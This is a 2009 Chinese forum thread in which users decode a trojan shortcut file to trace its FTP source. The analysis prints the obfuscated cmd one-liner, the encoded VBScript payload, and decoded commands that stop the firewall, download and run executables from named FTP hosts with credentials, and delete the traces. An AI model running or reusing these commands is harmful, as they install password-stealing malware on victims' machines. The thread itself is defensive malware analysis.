请高手解密一下这个Bat木马的地址，想找出源头

fsl

请问这种木马该怎么解密。想找出木马连接的ftp地址

post8

clean

dikex

这个实际是一个快捷方式（lnk文件），指向的目标为：

1. 
   
2. %COmSpEc% /C EcHo %i%o G%m%M^>E>q&EchO %i%Aa33^>^>e>>Q&echo %i%%D%b33^>^>E>>Q&EcHO %i%geT t T.VBs^>^>E>>Q&ecHo %I%By^>^>E>>q&EcHo %F%P%z%s:e>>q&ECho %c%Art t.vBS>>Q&SET Z= -&sET F=fT&SET m=03z.cO&SET D=b&SET I=ecHo &reN Q w.Bat&SeT c=ST&w.bAt&
   

复制代码

分段看

1. 
   
2. %COmSpEc% /C EcHo %i%o G%m%M^>E>q&EchO %i%Aa33^>^>e>>Q&echo %i%%D%b33^>^>E>>Q&EcHO %i%geT t T.VBs^>^>E>>Q&ecHo %I%By^>^>E>>q&EcHo %F%P%z%s:e>>q&ECho %c%Art t.vBS>>Q
   

复制代码

这个用于生成下面内容的文件，文件名为Q

1. 
   
2. %i%o G%m%M>E
   
3. %i%Aa33>>e
   
4. %i%%D%b33>>E
   
5. %i%geT t T.VBs>>E
   
6. %I%By>>E
   
7. %F%P%z%s:e
   
8. %c%Art t.vBS
   

复制代码

接着是第二段

1. 
   
2. SET Z= -&sET F=fT&SET m=03z.cO&SET D=b&SET I=ecHo &reN Q w.Bat&SeT c=ST&w.bAt
   

复制代码

定义一些环境变量Z、F、m、D、I、c，把Q重命名为w.bat，然后运行w.bat，此时上面定义的环境变量会传递给w.bat，于是实际执行的是

1. 
   
2. ecHo o G03z.cOM>E
   
3. ecHo Aa33>>e
   
4. ecHo bb33>>E
   
5. ecHo geT t T.VBs>>E
   
6. ecHo By>>E
   
7. fTP -s:e
   
8. STArt t.vBS
   

复制代码

用ftp命令下载G03z.cOM这个ftp服务器上面的文件t，保持为t.vbs并执行

1. 
   
2. sub k
   
3. for i=1 to UBound(s)
   
4. r=r&chr(s(i)-823)
   
5. next
   
6. Set kk = CreateObject("Wscript.Shell")
   
7. kk.run r,0
   
8. end sub
   
9. s=array(836,922,932,923,855,870,922,855,933,924,939,855,938,939,934,935,855,938,927,920,937,924,923,920,922,922,924,938,938,861,924,922,927,934,855,934,855,939,925,939,925,939,869,933,924,939,885,933,869,939,943,939,861,924,922,927,934,855,920,920,874,874,885,885,933,869,939,943,939,861,924,922,927,934,855,921,921,874,874,885,885,933,869,939,943,939,861,924,922,927,934,855,937,924,922,941,855,923,855,923,869,924,943,924,885,885,933,869,939,943,939,861,924,922,927,934,855,921,944,924,885,885,933,869,939,943,939,861,925,939,935,855,868,938,881,933,869,939,943,939,861,923,924,931,855,933,869,939,943,939,861,923,869,924,943,924,861,920,939,939,937,928,921,855,886,869,941,921,938,855,868,937,861,923,924,931,855,886,855,886,869,924,943,924,855,886,869,941,921,938,855,886,869,921,920,939,861,938,939,920,937,939,855,927,939,939,935,881,870,870,921,940,944,869,944,920,927,934,934,869,922,934,932,869,939,942,870)
   
10. k
    

复制代码

那vbs执行后会调用cmd（汗，搞那么多东西……）

1. 
   
2. cmd /c net stop sharedaccess&echo o tftft.net>n.txt&echo aa33>>n.txt&echo bb33>>n.txt&echo recv d d.exe>>n.txt&echo bye>>n.txt&ftp -s:n.txt&del n.txt&d.exe&attrib ?.vbs -r&del ? ?.exe ?.vbs ?.bat&start http://buy.yahoo.com.tw/
   

复制代码

再次ftp……这次是tftft.net上面的文件d，帐号aa33，密码bb33，保存为d.exe并运行之，之后还删除它们（貌似有特殊字符，懒得搞了），打开网页http://buy.yahoo.com.tw/

d.exe见附件，rar自解压缩包一个，内有两个exe

[ 本帖最后由 dikex 于 2009-11-7 16:12 编辑 ]

尤金卡巴斯基

2009/11/7 17:29:25        已清除        木马程序 Trojan-GameThief.Win32.OnLineGames.vuku        G:\Temp\Virus\d.rar/d.exe               
2009/11/7 17:30:14        已清除        木马程序 Trojan-Downloader.Win32.Pif.tj        G:\Temp\Virus\c.rar/c.bat

as4524

原帖由 dikex 于 2009-11-7 16:06 发表
这个实际是一个快捷方式（lnk文件），指向的目标为：
%COmSpEc% /C EcHo %i%o G%m%M^>E>q&EchO %i%Aa33^>^>e>>Q&echo %i%%D%b33^>^>E>>Q&EcHO %i%geT t T.VBs^>^>E>>Q&ecHo %I%By^>^>E>>q&EcHo %F%P%z%s:e>>q&ECho  ...

分析的不错

fsl

太好了， 写大哥

zzhao

学习学习